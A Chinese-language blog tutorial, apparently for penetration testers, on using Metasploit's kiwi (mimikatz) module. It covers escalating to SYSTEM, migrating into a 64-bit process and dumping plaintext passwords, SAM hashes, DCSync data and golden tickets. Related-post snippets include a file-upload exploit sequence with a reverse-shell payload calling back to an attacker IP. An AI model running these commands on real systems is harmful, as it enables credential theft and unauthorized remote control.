【工具使用】——MSF使用_MSF中kiwi(mimikatz)模块的使用

最新推荐文章于 2025-04-03 18:09:11 发布
最新推荐文章于 2025-04-03 18:09:11 发布
阅读量1.2w 收藏 123
点赞数 18
分类专栏: 工具使用 文章标签: php 系统安全 web安全 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45588247/article/details/119497964
版权
本文详细介绍了如何在Metasploit框架中使用kiwi模块进行系统权限提升和密码凭据获取。首先,讲解了从administrator用户提权到system权限的方法,包括getsystem命令的使用。接着,讨论了在64位系统中进行进程迁移的必要性,并给出了相关命令。最后,重点阐述了kiwi模块的功能,如creds_all用于列举所有凭据,kiwi_cmd执行mimikatz命令以获取系统敏感信息。整个过程详细展示了渗透测试中的关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

一、简介:

kiwi模块:
  mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。

二、前提:

1. 提权到system权限:

1.1 提到system有两个方法:

  一是当前的权限是administrator用户;
  二是利用其它手段先提权到administrator用户。然后administrator用户可以直接在meterpreter_shell中使用命令getsystem提权到system权限

1.2 进行提权:

命令:

getuid      #查看当前会话用户身份
getsystem   #自动尝试提权

2. 进程迁移:

  kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。
  所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制。

1、查看当前系统信息,可以看出目标系统是64位的:
命令:

sysinfo #查看当前系统信息

2、查看进程信息:
命令:

ps  #查看进程


3、把进程迁移到PID为504这个程序中(因为当前用户):
注:因为目标系统是64位的所以需要把meterpreter进程迁移到一个64位程序的进程中。
命令:

migrate [PID]

三、kiwi模块的使用:

load kiwi #加载kiwi模块
help kiwi #查看kiwi模块的使用

一些有关密码和凭据的命令:

creds_all:             #列举所有凭据
creds_kerberos:        #列举所有kerberos凭据
creds_msv:             #列举所有msv凭据
creds_ssp:             #列举所有ssp凭据
creds_tspkg:           #列举所有tspkg凭据
creds_wdigest:         #列举所有wdigest凭据
dcsync:                #通过DCSync检索用户帐户信息
dcsync_ntlm:           #通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:  #创建黄金票据
kerberos_ticket_list:  #列举kerberos票据
kerberos_ticket_purge: #清除kerberos票据
kerberos_ticket_use:   #使用kerberos票据
kiwi_cmd:              #执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:          #dump出lsa的SAM
lsa_dump_secrets:      #dump出lsa的密文
password_change:       #修改密码
wifi_list:             #列出当前用户的wifi配置文件
wifi_list_shared:      #列出共享wifi配置文件/编码

1. creds_all:

该命令可以列举系统中的明文密码:
命令:

creds_all  #列举所有凭据

2. kiwi_cmd:

kiwi_cmd 模块可以让我们使用mimikatz的全部功能,该命令后面接 mimikatz.exe 的命令:

kiwi_cmd sekurlsa::logonpasswords


MSFmimikatz模块使用
谢公子的博客
11-10 4203
目录 mimikatz模块的加载 mimikatz_command模块的用法 Kerberos模块 Livessp模块 MSV模块(列出密码哈希) SSP模块 tspkg模块 Wdigest模块 mimikatz模块的加载 mimikatz模块使用需要Administrator权限或者System权限。MSF中自带mimikatz模块MSF中的 mimikatz 模块同时支...
MSFmimikatz模块使用 编程
CodeRoarX的博客
09-21 353
Metasploit Framework(MSF)是一款功能强大的渗透测试工具,它提供了一个模块化的框架,用于执行各种渗透测试任务。在MSF中,我们可以使用mimikatz模块来利用mimikatz功能。本文将介绍如何在MSF使用mimikatz模块,并提供相关的源代码示例。启动MSF控制台,您可以在终端中输入"msfconsole"来启动。请注意,这只是一个示例脚本,您需要根据实际情况进行修改和定制。在实际使用中,请确保遵守适用的法律法规和道德准则,并获得适当的授权。希望这篇文章对您有帮助!
kali下通过msfkiwi(mimikatz)模块使用
失心少年
09-11 1864
kiwi模块mimikatz模块已经合并为kiwi模块使用kiwi模块需要system权限,所以我们在使用模块之前需要将当前MSF中的shell提升为system。
【内网安全】——meterpreter使用攻略
最新发布
qq_41701460的博客
04-03 1310
原贴在这:https://blog.csdn.net/qq_63844103/article/details/128815533。
MSFkiwi模块
weixin_74545038的博客
11-09 523
msfkiwi模块使用指南
msf使用Mimikatz
vt_yjx的博客
01-27 251
先ps查看windows上的进,然后选择一个64的进程号。说明:利用了红日靶场1的环境,此时已上线蚁剑。3.执行exe后上线到msf
工具使用】——Metasploit(MSF)使用详解(超详细)
2401_84254343的博客
06-25 1340
show options #查看这个模块需要配置的信息exploitinfo: #查看这个漏洞的信息show payloads #该命令可以查看当前漏洞利用模块下可用的所有Payloadset RHOST 192.168.100.158 #设置RHOST,也就是要攻击主机的ipset LHOST 192.168.100.132 #设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell。
mimikatz工具使用
weixin_45605313的博客
07-10 1407
mimikatz使用命令:msf下的mimikatz mimikatz:后渗透工具,从window进程中获取内存,并获取明文密码和NTLM哈希值的工具。 kali路径:/usr/share/windows-resources/mimikatz 使用工具移植到靶机中: win32目录下 命令: 命令 含义 :: 查询帮助信息 standard:基础命令 命令 含义 exit 退出 cls 清屏 version 版本 cd 切换目录 localt
生命在于学习——MSF初体验(二)
易水哲的博客
10-21 2394
MSF初体验(二)——Meterpreter命令
【2024版】Metasploit(MSF)下载安装及使用详解,永久免费使用,环境配置和使用技巧指南_msf工具下载(1)
2401_86951311的博客
09-12 1148
首先目标先要执行初始的溢出漏洞会话连接,可能是 bind正向连接,或者反弹 reverse 连接。反射连接的时候加载dll链接文件,同时后台悄悄处理 dll 文件。其次Meterpreter核心代码初始化,通过 socket套接字建立一个TLS/1.0加密隧道并发送GET请求给Metasploit服务端。Metasploit服务端收到这个GET请求后就配置相应客户端。最后,Meterpreter加载扩展,所有的扩展被加载都通过TLS/1.0进行数据传输。
基于MSF框架下的kiwi模块制作黄金票据
weixin_60109175的博客
04-05 5912
目录 一、kiwi模块使用简介 1.权限问题 2.使用注意事项 3.关于kiwi的命令简介 二、实验过程 1.环境构成 2.实验步骤 三、黄金票据的制作使用 1.制作票据的条件,以及如何获取该条件内容 2.制作黄金票据 3.黄金票据的使用 一、kiwi模块使用简介 1.权限问题 kiwi模块使用需要域内管理员或者系统权限,如果是非管理员权限那么使用会受到很大的限制 2.使用注意事项 msf中的kiwi模块同时支持32位和64位操作系统,...
MSFkiwi模块的应用编程
TechSavant的博客
08-16 334
可以通过在Metasploit Framework控制台中输入"help"命令来查看所有可用的kiwi模块命令和选项。MSF(Metasploit Framework)是一款功能强大的开源渗透测试框架,而kiwi模块则是其中一个非常有用的模块。总结起来,MSF中的kiwi模块是一款非常有用的渗透测试工具,能够帮助安全专家评估系统的安全性。通过正确配置参数和选项,并使用合适的攻击模块,可以实现各种渗透测试任务。然后,根据需要选择所需的攻击模块。此时,kiwi模块将开始执行所选的攻击,并在控制台显示攻击结果。
使用kiwi模块进行MSF编程
ByteWhizX的博客
09-17 291
通过使用kiwi模块,可以在Metasploit Framework中利用Windows系统中的漏洞进行攻击和渗透测试。请记住,在进行任何渗透测试活动时,确保事先获得适当的授权,并且仅在合法的环境中进行测试。MSF(Metasploit Framework)是一款广泛使用渗透测试工具,而kiwi模块MSF中的一个重要模块,它提供了对Windows操作系统的攻击和渗透的支持。除了上述功能之外,kiwi模块还支持许多其他的攻击和渗透技术,如获取Windows系统的明文密码、执行Shell命令等。
MSFkiwi模块使用
谢公子的博客
03-11 4122
kiwi模块的加载 使用kiwi模块需要system权限,所以我们在使用模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。 提权到system权限 进程迁移 kiwi...
Metasploit-进阶用户密码与mimikatz模块kiwi模块
5L2g556F5ZWl77yf
10-30 6509
Metasploit 一. 基础 1. 抓取自动登录的密码 run windows/gather/credentials/windows_autologin 2. 未提权可以使用此命令查询hashdump run windows/gather/smart_hashdump 3. 提权 getsystem 4. 提权后可执行 run hashdump 获取密码 run hashdump 二. mimikatz模块 1. 加载mimikatz模块获取更多权限 ps:mimikatz模块已经合并为k
内网渗透系列之mimikatz使用以及后门植入
lza20001103的博客
09-04 4614
内网渗透系列之mimikatz使用以及后门植入 文章目录内网渗透系列之mimikatz使用以及后门植入前言mimikatz使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
cs与msf权限传递,mimikatz抓取明文密码
m0_70638961的博客
05-28 481
由于Windows在win10或Windows2012R2以上时,默认的缓存表中是不存在明文密码的,显示为null,如图所示。创建foreign监听器-->msf监听模块设置端口-->cs执行新建会话选择创建的监听器。所以在这里我们抓取明文的步骤是:手工修改注册表-->强制锁屏-->等待管理员重新登录。重新登录之后可以看到明文抓取成功。强制锁屏可以通过脚本来实现。到这里显示了msf界面就表示传递成功了。3.新建会话选择创建的监听器。
cs与msf权限传递,以及mimikatz抓取明文密码
M372109150的博客
06-15 1519
cs与msf权限传递,以及mimikatz抓取win10明文密码
msf 文件上传漏洞 模块使用案例
06-06
MSF(Metasploit Framework)是一款功能强大的渗透测试工具,其中包含了很多漏洞利用模块。其中,文件上传漏洞是常见的一种漏洞类型,攻击者可以利用该漏洞上传恶意文件,从而控制目标系统。下面是一个使用MSF的文件上传漏洞利用模块的案例: 1. 首先,使用MSF的search命令查找可用的文件上传漏洞利用模块,命令如下: ``` msf > search upload ``` 2. 找到一个目标系统存在文件上传漏洞的网站,并确定上传文件的路径和可上传的文件类型。 3. 利用MSF的exploit命令选择相应的模块,并设置相关参数,例如: ``` msf > use exploit/multi/http/wp_contact_form_7_file_upload msf exploit(wp_contact_form_7_file_upload) > set RHOSTS 192.168.1.100 msf exploit(wp_contact_form_7_file_upload) > set TARGETURI /contact msf exploit(wp_contact_form_7_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp msf exploit(wp_contact_form_7_file_upload) > set LHOST 192.168.1.200 ``` 其中,RHOSTS为目标系统的IP地址,TARGETURI为上传文件的路径,PAYLOAD为要上传的恶意文件类型,LHOST为攻击者的IP地址。 4. 运行exploit命令,执行漏洞利用,上传恶意文件并获得对目标系统的控制: ``` msf exploit(wp_contact_form_7_file_upload) > exploit ``` 以上就是使用MSF的文件上传漏洞利用模块的一个案例。需要注意的是,在实际漏洞利用中,应该先进行充分的测试和准备,避免对目标系统造成不必要的损失。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值